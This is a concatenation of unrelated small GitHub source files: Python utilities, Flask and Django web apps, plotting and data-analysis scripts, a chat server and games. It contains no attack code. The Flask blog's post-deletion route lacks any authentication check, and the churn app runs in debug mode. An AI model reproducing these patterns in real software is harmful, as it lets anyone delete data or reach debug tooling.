platform\nimport re\nfrom enum import Enum\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, no_type_check\n\nif TYPE_CHECKING: # pragma: no cover\n from typing import Any, Optional, Tuple, Union\n\n\nLOGGER = logging.getLogger(__file__)\nLOGGER.setLevel(logging.DEBUG)\n\n\nclass Emoji(str, Enum):\n \"\"\"Unicode strings for certain emojis.\"\"\"\n\n def __new__(cls, value: str) -> \"Emoji\":\n obj = str.__new__(cls, value)\n if platform.system() == \"Windows\":\n # Windows does not support unicode emojis, so we replace them with\n # their corresponding unicode escape sequences\n obj._value_ = value.encode(\"unicode_escape\").decode(\"utf-8\")\n else:\n obj._value_ = value\n return obj\n\n PARTY_POPPER = \"\\U0001f389\"\n CHECK_MARK = \"\\u2714\"\n CROSS_MARK = \"\\u274c\"\n CURLY_LOOP = \"\\u27b0\"\n\n\nclass SemanticVersion(str):\n \"\"\"A semantic version.\n\n See [SemVer.org](https://semver.org) for more information about semantic\n versioning.\n\n The semantic version is in this invocation considered to build up in the following\n way:\n\n ..-+\n\n Where the names in carets are callable attributes for the instance.\n\n When casting instances of `SemanticVersion` to `str`, the full version will be\n returned, i.e., as shown above, with a minimum of major.minor.patch.\n\n For example, for the version `1.5`, i.e., `major=1, minor=5`, the returned `str`\n representation will be the full major.minor.patch version: `1.5.0`.\n The `patch` attribute will default to `0` while `pre_release` and `build` will be\n `None`, when asked for explicitly.\n\n Precedence for comparing versions is done according to the rules outlined in point\n 11 of the specification found at [SemVer.org](https://semver.org/#spec-item-11).\n\n Parameters:\n major (Union[str, int]): The major version.\n minor (Optional[Union[str, int]]): The minor version.\n patch (Optional[Union[str, int]]): The patch version.\n pre_release (Optional[str]): The pre-release part of the version, i.e., the\n part supplied after a minus (`-`), but before a plus (`+`).\n build (Optional[str]): The build metadata part of the version, i.e., the part\n supplied at the end of the version, after a plus (`+`).\n\n Attributes:\n major (int): The major version.\n minor (int): The minor version.\n patch (int): The patch version.\n pre_release (str): The pre-release part of the version, i.e., the part\n supplied after a minus (`-`), but before a plus (`+`).\n build (str): The build metadata part of the version, i.e., the part supplied at\n the end of the version, after a plus (`+`).\n\n \"\"\"\n\n _REGEX = (\n r\"^(?P0|[1-9]\\d*)(?:\\.(?P0|[1-9]\\d*))?(?:\\.(?P0|[1-9]\\d*))?\"\n r\"(?:-(?P(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)\"\n r\"(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?\"\n r\"(?:\\+(?P[0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\"\n )\n\n @no_type_check\n def __new__(\n cls, version: \"Optional[str]\" = None, **kwargs: \"Union[str, int]\"\n ) -> \"SemanticVersion\":\n return super().__new__(\n cls, version if version else cls._build_version(**kwargs)\n )\n\n def __init__(\n self,\n version: \"Optional[str]\" = None,\n *,\n major: \"Union[str, int]\" = \"\",\n minor: \"Optional[Union[str, int]]\" = None,\n patch: \"Optional[Union[str, int]]\" = None,\n pre_release: \"Optional[str]\" = None,\n build: \"Optional[str]\" = None,\n ) -> None:\n if version is not None:\n if major or minor or patch or pre_release or build:\n raise ValueError(\n \"version cannot be specified along with other parameters\"\n )\n\n match = 
re.match(self._REGEX, version)\n if match is None:\n raise ValueError(\n f\"version ({version}) cannot be parsed as a semantic version \"\n \"according to the SemVer.org regular expression\"\n )\n major, minor, patch, pre_release, build = match.groups()\n\n self._major = int(major)\n self._minor = int(minor) if minor else 0\n self._patch = int(patch) if patch else 0\n self._pre_release = pre_release if pre_release else None\n self._build = build if build else None\n\n @classmethod\n def _build_version(\n cls,\n major: \"Optional[Union[str, int]]\" = None,\n minor: \"Optional[Union[str, int]]\" = None,\n patch: \"Optional[Union[str, int]]\" = None,\n pre_release: \"Optional[str]\" = None,\n build: \"Optional[str]\" = None,\n ) -> str:\n \"\"\"Build a version from the given parameters.\"\"\"\n if major is None:\n raise ValueError(\"At least major must be given\")\n version = str(major)\n if minor is not None:\n version += f\".{minor}\"\n if patch is not None:\n if minor is None:\n raise ValueError(\"Minor must be given if patch is given\")\n version += f\".{patch}\"\n if pre_release is not None:\n # semver spec #9: A pre-release version MAY be denoted by appending a\n # hyphen and a series of dot separated identifiers immediately following\n # the patch version.\n # https://semver.org/#spec-item-9\n if patch is None:\n raise ValueError(\"Patch must be given if pre_release is given\")\n version += f\"-{pre_release}\"\n if build is not None:\n # semver spec #10: Build metadata MAY be denoted by appending a plus sign\n # and a series of dot separated identifiers immediately following the patch\n # or pre-release version.\n # https://semver.org/#spec-item-10\n if patch is None:\n raise ValueError(\"Patch must be given if build is given\")\n version += f\"+{build}\"\n return version\n\n @property\n def major(self) -> int:\n \"\"\"The major version.\"\"\"\n return self._major\n\n @property\n def minor(self) -> int:\n \"\"\"The minor version.\"\"\"\n return self._minor\n\n @property\n def patch(self) -> int:\n \"\"\"The patch version.\"\"\"\n return self._patch\n\n @property\n def pre_release(self) -> \"Union[None, str]\":\n \"\"\"The pre-release part of the version\n\n This is the part supplied after a minus (`-`), but before a plus (`+`).\n \"\"\"\n return self._pre_release\n\n @property\n def build(self) -> \"Union[None, str]\":\n \"\"\"The build metadata part of the version.\n\n This is the part supplied at the end of the version, after a plus (`+`).\n \"\"\"\n return self._build\n\n def __str__(self) -> str:\n \"\"\"Return the full version.\"\"\"\n return (\n f\"{self.major}.{self.minor}.{self.patch}\"\n f\"{f'-{self.pre_release}' if self.pre_release else ''}\"\n f\"{f'+{self.build}' if self.build else ''}\"\n )\n\n def __repr__(self) -> str:\n \"\"\"Return the string representation of the object.\"\"\"\n return repr(self.__str__())\n\n def _validate_other_type(self, other: \"Any\") -> \"SemanticVersion\":\n \"\"\"Initial check/validation of `other` before rich comparisons.\"\"\"\n not_implemented_exc = NotImplementedError(\n f\"Rich comparison not implemented between {self.__class__.__name__} and \"\n f\"{type(other)}\"\n )\n\n if isinstance(other, self.__class__):\n return other\n\n if isinstance(other, str):\n try:\n return self.__class__(other)\n except (TypeError, ValueError) as exc:\n raise not_implemented_exc from exc\n\n raise not_implemented_exc\n\n def __lt__(self, other: \"Any\") -> bool:\n \"\"\"Less than (`<`) rich comparison.\"\"\"\n other_semver = 
self._validate_other_type(other)\n\n if self.major < other_semver.major:\n return True\n if self.major == other_semver.major:\n if self.minor < other_semver.minor:\n return True\n if self.minor == other_semver.minor:\n if self.patch < other_semver.patch:\n return True\n if self.patch == other_semver.patch:\n if self.pre_release is None:\n return False\n if other_semver.pre_release is None:\n return True\n return self.pre_release < other_semver.pre_release\n return False\n\n def __le__(self, other: \"Any\") -> bool:\n \"\"\"Less than or equal to (`<=`) rich comparison.\"\"\"\n return self.__lt__(other) or self.__eq__(other)\n\n def __eq__(self, other: \"Any\") -> bool:\n \"\"\"Equal to (`==`) rich comparison.\"\"\"\n other_semver = self._validate_other_type(other)\n\n return (\n self.major == other_semver.major\n and self.minor == other_semver.minor\n and self.patch == other_semver.patch\n and self.pre_release == other_semver.pre_release\n )\n\n def __ne__(self, other: \"Any\") -> bool:\n \"\"\"Not equal to (`!=`) rich comparison.\"\"\"\n return not self.__eq__(other)\n\n def __ge__(self, other: \"Any\") -> bool:\n \"\"\"Greater than or equal to (`>=`) rich comparison.\"\"\"\n return not self.__lt__(other)\n\n def __gt__(self, other: \"Any\") -> bool:\n \"\"\"Greater than (`>`) rich comparison.\"\"\"\n return not self.__le__(other)\n\n def next_version(self, version_part: str) -> \"SemanticVersion\":\n \"\"\"Return the next version for the specified version part.\n\n Parameters:\n version_part: The version part to increment.\n\n Returns:\n The next version.\n\n Raises:\n ValueError: If the version part is not one of `major`, `minor`, or `patch`.\n\n \"\"\"\n if version_part not in (\"major\", \"minor\", \"patch\"):\n raise ValueError(\n \"version_part must be one of 'major', 'minor', or 'patch', not \"\n f\"{version_part!r}\"\n )\n\n if version_part == \"major\":\n return self.__class__(f\"{self.major + 1}.0.0\")\n if version_part == \"minor\":\n return self.__class__(f\"{self.major}.{self.minor + 1}.0\")\n\n return self.__class__(f\"{self.major}.{self.minor}.{self.patch + 1}\")\n\n\ndef update_file(\n filename: Path, sub_line: \"Tuple[str, str]\", strip: \"Optional[str]\" = None\n) -> None:\n \"\"\"Utility function for tasks to read, update, and write files\"\"\"\n if strip is None and filename.suffix == \".md\":\n # Keep special white space endings for markdown files\n strip = \"\\n\"\n lines = [\n re.sub(sub_line[0], sub_line[1], line.rstrip(strip))\n for line in filename.read_text(encoding=\"utf8\").splitlines()\n ]\n filename.write_text(\"\\n\".join(lines) + \"\\n\", encoding=\"utf8\")\n","repo_name":"SINTEF/ci-cd","sub_path":"ci_cd/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26248217883","text":"import pickle\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pandas import DataFrame\r\nfrom flask import Flask,render_template, request, url_for, jsonify , redirect\r\nimport re\r\nimport random\r\nimport sqlite3\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef main():\r\n return render_template('index.html')\r\n\r\n@app.route(\"/prediction\")\r\ndef hello_word():\r\n return render_template('prediction.html')\r\n\r\n@app.route(\"/output\",methods=['GET','POST'])\r\ndef output():\r\n f = open(\"model.sav\", \"rb\") \r\n mdl = pickle.load(f)\r\n f.close()\r\n #fonction de prediction du\r\n def y_pred(X):\r\n y_pred = mdl.predict(X)\r\n 
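# the pickled model predicts churn: 1 = likely to leave the credit-card service, 0 = likely to stay (cf. resultat_finale below)\r\n        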
return(y_pred)\r\n #fonction qui retourne le resultat final de la prédiction\r\n def resultat_finale(data):\r\n a = np.transpose(DataFrame(data)) \r\n a = str(y_pred(a)).strip('[]')\r\n return(int(a))\r\n a= resultat_finale(request.json.values())\r\n if a==1:\r\n phrase ='
Ce client est susceptible de quitter le service de la carte bancaire
'\r\n elif a==0:\r\n phrase='
Bonne nouvelle ! Ce client ne quittera pas le service de la carte bancaire.
'\r\n else:\r\n phrase='
Nous ne parvenons pas à faire de prédiction, vérifiez vos informations
.'\r\n return jsonify(phrase)\r\n\r\n@app.route(\"/echantillon\",methods=['GET', 'POST'])\r\ndef echantillon():\r\n\r\n return render_template('echantillon.html')\r\n\r\n@app.route(\"/resultat\",methods=['POST'])\r\ndef output_1():\r\n nb = request.form['input_number']\r\n conn = sqlite3.connect('db.sqlite3')\r\n cursor =conn.cursor()\r\n cursor.execute(\"SELECT Months_on_book,Months_Inactive_12_mon,Credit_Limit,Avg_Open_To_Buy,Total_Amt_Chng_Q4_Q1,Total_Trans_Amt,Total_Trans_Ct,Total_Ct_Chng_Q4_Q1, Attrition_Flag FROM data_credit_card order by random() LIMIT {} \".format(int(nb))) \r\n data = cursor.fetchall()\r\n f_data = data\r\n cursor.close()\r\n f = open(\"model.sav\", \"rb\")\r\n mdl = pickle.load(f)\r\n f.close()\r\n data=np.array(data)\r\n data=pd.DataFrame(data, columns=['Months_on_book','Months_Inactive_12_mon','Credit_Limit','Avg_Open_To_Buy','Total_Amt_Chng_Q4_Q1','Total_Trans_Amt','Total_Trans_Ct','Total_Ct_Chng_Q4_Q1','Attrition_Flag'])\r\n data = DataFrame(data)\r\n data = data.drop('Attrition_Flag',axis=1)\r\n y_pred = mdl.predict(data)\r\n y_pred = np.array(y_pred)\r\n y_pred = pd.DataFrame(y_pred) \r\n y_pred =DataFrame(y_pred)\r\n f_data = DataFrame(f_data) \r\n v = pd.concat([f_data,y_pred], axis=1)\r\n headings = ('Months_Inactive_12_mon','Months_Inactive_12_mon','Credit_Limit','Avg_Open_To_Buy','Total_Amt_Chng_Q4_Q1','Total_Trans_Amt','Total_Trans_Ct','Total_Ct_Chng_Q4_Q1','Attrition_Flag','Prediction')\r\n return render_template('resultat_.html',headings= headings ,data=v.values) \r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"benmatrood/Analyse_bank","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14630465740","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nw = np.logspace(-2, 1, 1000)\ns = w*1j\n\nplt.figure('Figure 5.4')\nKs = [0.1, 0.5, 1.0, 2.0]\nfor k in Ks:\n L = k/s * (2 - s)/(2 + s)\n T = L/(1+L)\n S = 1 - T\n plt.loglog(w, abs(S))\nplt.legend([\"k = %1.1f\" % K for K in Ks], loc=2)\nplt.xlabel('Frequency') \nplt.ylabel('Magnitude $|S|$')\nplt.show()\n","repo_name":"u20806389/CBT-700-Class-Group","sub_path":"reproductions/Figure/Figure_05_04.py","file_name":"Figure_05_04.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10677949055","text":"import random\nfrom turtle import Turtle, Screen\n\nis_race_on = False\nscreen = Screen()\nscreen.setup(width=500, height=400)\nuser_bet = screen.textinput(title=\"Make your bet\", prompt=\"Which turtle will win the race? Enter a color: \")\ncolors = [\"red\", \"orange\", \"yellow\", \"blue\", \"purple\", \"green\"]\ntim = []\nyy = -100\n\nfor color in colors:\n timmy = Turtle(shape=\"turtle\")\n timmy.color(color)\n timmy.penup()\n timmy.goto(x=-230, y=yy)\n tim.append(timmy)\n yy += 40\n\nif user_bet:\n is_race_on = True\n\nwhile is_race_on:\n for turtle in tim:\n if turtle.xcor() > 230:\n is_race_on = False\n winning_color = turtle.pencolor()\n if winning_color == user_bet:\n print(f\"You've won! The {winning_color} turtle is the winner!\")\n else:\n print(f\"You've lost! 
The {winning_color} turtle is the winner!\")\n rand_distance = random.randint(0, 10)\n turtle.forward(rand_distance)\n\nscreen.exitonclick()\n","repo_name":"KoshCocna/11_racingGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
{"seq_id":"12534027695","text":"from django.urls import path\n\nfrom .views import *\n\n\nurlpatterns = [\n path('', joinPage, name='login'),\n # path('register/', registerPage, name='register'),\n path('logout/', logoutUser, name='logout'),\n path('profile//', profilePage, name='profile'),\n path('members/', membersPage, name='members'),\n\n \n]\n","repo_name":"myvu0405/django-challenge-the-linkedin","sub_path":"linkedin/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"26837578055","text":"# import the libraries\nfrom funcoes_servidor import *\nfrom sys import *\n\nthread_clientes = minhaThread(conexao_clientes)\nthread_clientes.daemon = True\nthread_clientes.start()\nwhile (1):\n comandoServer = input()\n if comandoServer.upper() == \"SAIR()\":\n for sock in dicionario_clientes.keys():\n sock.send(encapsular('', 'SAIR', 'Server shutting down...'))\n serverSocket.close() # close the server socket\n exit() # exit the program\n elif comandoServer.upper() == \"LISTA()\":\n if len(dicionario_clientes) != 0:\n for nome_cliente, endereco_cliente in zip(dicionario_clientes.values(),dicionario_enderecos_clientes.values()):\n item = \"<\"+nome_cliente+\",\"+endereco_cliente[0]+\",\"+str(endereco_cliente[1])+\">\"\n print(item) \n else:\n print(\"No clients are connected!\")\n\n","repo_name":"mateus-abrantes/Chat","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"2575572375","text":"\"\"\"\r\nFilename_rev: Finding Numbers in a Haystack.py\r\n\r\nAuthor: Phillip Truong\r\n\r\nEmail Address: phil_t_@hotmail.com\r\n\r\nDate: 2016-09-13\r\n\r\nSummary of Requirements: (if applicable). 
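servidor.py above keeps two parallel dicts (names and addresses) and pairs them with `zip(...values(), ...values())`, which only lines up if both dicts were filled in the same order. A single registry keyed by socket avoids that coupling; `clients` and `broadcast` below are illustrative names, not from the repo:

```python
import socket

# socket -> (nickname, (host, port)); an accept loop would populate this
clients: dict = {}

def broadcast(message: bytes) -> None:
    # iterate over a copy so dead sockets can be dropped mid-loop
    for sock in list(clients):
        try:
            sock.sendall(message)
        except OSError:
            sock.close()
            del clients[sock]
```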
https://www.coursera.org/learn/python-network-data\r\n\r\nDescription: Counting numbers in lines and then adding them.\r\n\r\n\"\"\"\r\n\r\nimport re\r\n\r\nlist_num = []\r\n\r\nf = open('Finding Numbers in a Haystack (Actual)', 'r')\r\n\r\nfor line in f:\r\n line_num = (re.findall('[0-9]+', line))\r\n if line_num != []:\r\n for i in line_num:\r\n list_num.append(int(i))\r\n\r\nprint(sum(list_num))\r\n","repo_name":"sunearn/Coursera-Using-Python-to-Access-Web-Data","sub_path":"Week2:Finding Numbers in a Haystack.py","file_name":"Week2:Finding Numbers in a Haystack.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19928299534","text":"from sys import argv\nimport numpy as np\nimport os\nimport math\nimport struct\ndef del_0x(h2):\n return h2[2:]#去掉0x\ndef hex_to_float(h):\n tuple1=struct.unpack('>d', bytes().fromhex(h.strip().zfill(16)))\n list1 = list(tuple1)\n return float(list1[0])\ndef float_to_hex(h1):\n return hex(struct.unpack('>Q', struct.pack('>d', h1))[0])\n\ndef distribution( ):\n f = open(\"../data/sampleResult1.txt\",'r')#argv[1] input1\n f1 = open(\"../data/error/\"+argv[3]+argv[4]+\".txt\", 'r') # argv[2] input2\n lines1 =int(argv[1])*4096 #51200000\n\n\n f2=open(\"../data/analysis/higherror/\"+argv[3]+argv[4]+\"_\"+argv[2]+\".txt\",'a+')\n\n for i in range(1, lines1 + 1):\n data1 = f.readline()\n data2 = f1.readline()\n flag=float(argv[2])#1.0e-15\n if math.isinf(hex_to_float(data2))==True:\n continue\n elif hex_to_float(data2)==1.0 or hex_to_float(data2)==-1.0:\n continue\n elif math.fabs(hex_to_float(data2)) >= flag:\n f2.write(data1.strip())\n f2.write(',')\n f2.write(data2.strip())\n f2.write(',')\n f2.write(str(hex_to_float(data2)))\n f2.write('\\n')\n else:\n continue\n #print(\"111\")\n f.close()\n f1.close()\n f2.close()\nif __name__ == '__main__':\n distribution()\n","repo_name":"LiangJinXiu/MLerror","sub_path":"bin/searchhigh.py","file_name":"searchhigh.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11415896829","text":"\nimport pandas as pd\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport warnings\nfrom datetime import datetime,date\nimport ast\nimport os\nimport json\n\nparkdata=pd.read_csv(\"data/phoenix.csv\")\nparkdata.columns=[\"index\",\"placekey\",\"low_svi_percentage\",\"safegraph_place_id\",\"parent_placekey\",\"parent_safegraph_place_id\",\"location_name\",\"street_address\",\"city\",\"region\",\"postal_code\",\"safegraph_brand_ids\",\"brands\",\"time\",\"date_range_end\",\"raw_visit_counts\",\"raw_visitor_counts\",\"visits_by_day\",\"poi_cbg\",\"visitor_home_cbgs\",\"visitor_daytime_cbgs\",\"visitor_country_of_origin\",\"distance_from_home\",\"median_dwell\",\"bucketed_dwell_times\",\"related_same_day_brand\",\"related_same_month_brand\",\"popularity_by_hour\",\"popularity_by_day\",\"device_type\"]\n\nparkdata[\"date\"] = pd.to_datetime(parkdata[\"time\"].str[0:10])\n\nparkdata.sort_values('date')\n\nmask1 = (parkdata[\"date\"] < pd.to_datetime('2020-03-01'))\nmask2 = (parkdata[\"date\"] >= pd.to_datetime('2020-03-01')) & (parkdata[\"date\"] <= pd.to_datetime('2020-03-31'))\nmask3 = (parkdata[\"date\"] > pd.to_datetime('2020-03-31'))\n\nparkdataPRE = parkdata.loc[mask1]\nparkdataSAHO = parkdata.loc[mask2]\nparkdataPOST = parkdata.loc[mask3]\n\na = [[0, 0, 0, 0, 0, 0, 0],[0, 0, 0, 0, 0, 0, 0]]\ncount = 0\nfor entry in 
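The Coursera exercise above collects every digit run with `re.findall` and then sums the list; the whole script reduces to one expression around the same pattern:

```python
import re

def sum_numbers(text: str) -> int:
    # each run of digits becomes one integer, then everything is summed
    return sum(int(n) for n in re.findall(r"[0-9]+", text))

assert sum_numbers("x-2 hits: 10 and 30") == 42
```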
parkdataPRE[\"popularity_by_day\"]:\n\n map = json.loads(entry)\n i = 0\n for x in map:\n a[0][i] += map[x]\n i+=1\n #print(map[x])\n count+=1\nprint(count)\ncount = 0\nfor entry in parkdataPOST[\"popularity_by_day\"]:\n\n map = json.loads(entry)\n i = 0\n for x in map:\n a[1][i] += map[x]\n i+=1\n #print(map[x])\n count+=1\nprint(count)\n\nprint(a)\n","repo_name":"sanasc/research-parks","sub_path":"safe_graph_day_analysis.py","file_name":"safe_graph_day_analysis.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27670313212","text":"from flask import Flask, render_template, redirect, url_for, flash, abort\nfrom flask_bootstrap import Bootstrap\nfrom flask_ckeditor import CKEditor\nfrom datetime import date\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.orm import relationship\nfrom flask_login import UserMixin, login_user, LoginManager, login_required, current_user, logout_user\nfrom forms import CreatePostForm, CreateCommentForm, RegisterForm, LoginForm\nfrom flask_gravatar import Gravatar\nfrom functools import wraps\nimport os\n\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = os.environ.get('SECRET_KEY')\nckeditor = CKEditor(app)\nBootstrap(app)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = \"login\"\n\n##CONNECT TO DB\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', 'sqlite:///blog.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ngravatar = Gravatar(app,\n size=100,\n rating='g',\n default='retro',\n force_default=False,\n force_lower=False,\n use_ssl=False,\n base_url=None)\n\ndb = SQLAlchemy(app)\n\n\n##CONFIGURE TABLES\n\n\nclass User(UserMixin, db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(250), nullable=False)\n password = db.Column(db.String(250), unique=True, nullable=False)\n name = db.Column(db.String(250), nullable=False)\n # blog_posts = relationship(\"BlogPost\", back_populates=\"author\")\n blog_posts = relationship(\"BlogPost\", backref=\"author\")\n comments = relationship(\"Comment\", backref=\"commenter\")\n # comments = relationship(\"Comment\", back_populates=\"user\")\n\n\n\nclass BlogPost(db.Model):\n __tablename__ = \"blog_posts\"\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(250), unique=True, nullable=False)\n subtitle = db.Column(db.String(250), nullable=False)\n date = db.Column(db.String(250), nullable=False)\n body = db.Column(db.Text, nullable=False)\n img_url = db.Column(db.String(250), nullable=False)\n author_id = db.Column(db.Integer, db.ForeignKey(\"users.id\"), nullable=False)\n # author = relationship(\"User\", back_populates=\"blog_posts\")\n comments = relationship('Comment', backref=\"post\")\n # comments = relationship('Comment', back_populates=\"post\")\n\n\nclass Comment(db.Model):\n __tablename__ = \"comments\"\n id = db.Column(db.Integer, primary_key=True)\n comment = db.Column(db.String(250), nullable=True)\n post_id = db.Column(db.Integer, db.ForeignKey('blog_posts.id'), nullable=False)\n # post = relationship(\"BlogPost\", back_populates='comments')\n commenter_id = db.Column(db.Integer, db.ForeignKey(\"users.id\"), nullable=False)\n # user = relationship('User', back_populates='comments')\n\n# one to manyについて\n# ForeingnKey外部キー(親テーブルのid)を子テーブル(blog_posts)に設定する\n# 
authorにUserインスタンスが入るとそれがもつidを取り出してauthor_idに入いり、\n# 一方そのUserインスタンスのblog_postsには外部キーauthor_idの値をもつblogpostが全て入る\n\n# manyの方にoneからの外部キーを設定して、それに対応するoneインスタンスが入るプロパティをrelationship()で設定してoneと紐づける。\n# 逆にoneの方でも自身の外部キー(ここではPKのid)に応じたmanyインスタンスが入るプロパティをrelationship()で設定してmanyへの紐づけを行う。\n# その際には対応するエンティティ(クラス)のどのプロパティに紐づいているを互いにback_populatesパラメータで明示する\n\n# ①manyの方にoneからの外部キーを設定して、\n# ②oneの方でrelationship()を使い、manyとの紐づけを行う。パラメーターとしてmanyのクラス名,manyに作成されるプロパティ名を入れる\n# ③manyには自動的にoneのクラスが入るプロパティが作成され、①で設定したプロパティに外部キーが入り、oneには外部キーに該当するoneオブジェクトがリストで入る\n\ndef admin_only(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if not current_user.get_id() == \"1\":\n return abort(403)\n return f(*args, **kwargs)\n return decorated_function\n\ndb.create_all()\n\n@login_manager.user_loader\ndef load_user(user_id):\n return db.session.query(User).get(user_id)\n\n@app.route('/')\ndef get_all_posts():\n # print(current_user.blog_posts)\n posts = BlogPost.query.all()\n\n return render_template(\"index.html\", all_posts=posts)\n\n\n@app.route('/register', methods=['POST', 'GET'])\ndef register():\n register_form = RegisterForm()\n if register_form.validate_on_submit():\n inputted_email = register_form.email.data\n inputted_password = register_form.password.data\n inputted_name = register_form.name.data\n\n user = db.session.query(User).filter_by(email=inputted_email).first()\n if user:\n flash('You have signed up with that email. Please login.')\n return redirect(url_for('login'))\n\n hashed_and_salted_password = generate_password_hash(inputted_password)\n\n new_user = User(\n email=inputted_email,\n password=hashed_and_salted_password,\n name=inputted_name\n )\n db.session.add(new_user)\n db.session.commit()\n login_user(new_user)\n return redirect(url_for('get_all_posts'))\n return render_template(\"register.html\", form=register_form)\n\n\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n login_form = LoginForm()\n if login_form.validate_on_submit():\n inputted_email = login_form.email.data\n inputted_password = login_form.password.data\n user = db.session.query(User).filter_by(email=inputted_email).first()\n if not user:\n flash('The email does not exist. Please try again.')\n return redirect(url_for('login'))\n elif not check_password_hash(user.password, inputted_password):\n flash('Password incorrect. 
Please try again.')\n return redirect(url_for('login'))\n else:\n login_user(user)\n return redirect(url_for('get_all_posts'))\n return render_template(\"login.html\", form=login_form)\n\n# logout = decorated_view\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('get_all_posts'))\n\n# @app.route(\"/post\")\n@app.route(\"/post/\", methods=['POST', 'GET'])\ndef show_post(post_id):\n comment_form = CreateCommentForm()\n requested_post = BlogPost.query.get(post_id)\n # print(requested_post.author.email)\n all_comments = requested_post.comments\n # print(all_comments[0].author.email)\n # all_comments = db.session.query(Comment).filter_by(post_id=post_id).all()\n if comment_form.validate_on_submit():\n if not current_user.is_authenticated:\n flash('You need to login or register to comment')\n return redirect(url_for('login'))\n # 上からコードを読んで親テーブルでリレーションされた順、その際に設定されたプロパティんに引数を入れなければならない。\n # 逆にすると何故か片方生成されない\n new_comment = Comment(\n comment=comment_form.body.data,\n commenter=current_user,\n post=requested_post\n )\n db.session.add(new_comment)\n db.session.commit()\n return redirect(url_for('show_post', post_id=post_id))\n return render_template(\"post.html\", post=requested_post, form=comment_form, comments=all_comments)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/contact\")\ndef contact():\n return render_template(\"contact.html\")\n\n\n@app.route(\"/new-post\", methods=['POST', 'GET'])\n@admin_only\ndef add_new_post():\n form = CreatePostForm()\n if form.validate_on_submit():\n new_post = BlogPost(\n title=form.title.data,\n subtitle=form.subtitle.data,\n body=form.body.data,\n author=current_user,\n img_url=form.img_url.data,\n date=date.today().strftime(\"%B %d, %Y\"),\n )\n db.session.add(new_post)\n db.session.commit()\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"make-post.html\", form=form)\n\n\n@app.route(\"/edit-post/\", methods=['POST', 'GET'])\n@admin_only\ndef edit_post(post_id):\n post = BlogPost.query.get(post_id)\n edit_form = CreatePostForm(\n title=post.title,\n subtitle=post.subtitle,\n img_url=post.img_url,\n body=post.body\n )\n if edit_form.validate_on_submit():\n post.title = edit_form.title.data\n post.subtitle = edit_form.subtitle.data\n post.img_url = edit_form.img_url.data\n post.body = edit_form.body.data\n db.session.commit()\n return redirect(url_for(\"show_post\", post_id=post.id))\n\n return render_template(\"make-post.html\", form=edit_form)\n\n\n@app.route(\"/delete/\")\ndef delete_post(post_id):\n post_to_delete = BlogPost.query.get(post_id)\n db.session.delete(post_to_delete)\n db.session.commit()\n return redirect(url_for('get_all_posts'))\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"aiztky123/practice-blog-site","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40091498504","text":"import logging\nimport os\n# Custom Libraries\nimport splunk_appinspect\n\nreport_display_order = 2\nlogger = logging.getLogger(__name__)\n\n\n@splunk_appinspect.cert_version(min=\"1.1.23\")\n@splunk_appinspect.tags(\"splunk_appinspect\")\ndef check_indexes_conf_does_not_exist(app, reporter):\n \"\"\"Check that the app does not create indexes.\"\"\"\n if app.file_exists(\"default\", \"indexes.conf\"):\n file_path = os.path.join(\"default\", \"indexes.conf\")\n reporter_output = (\"Apps 
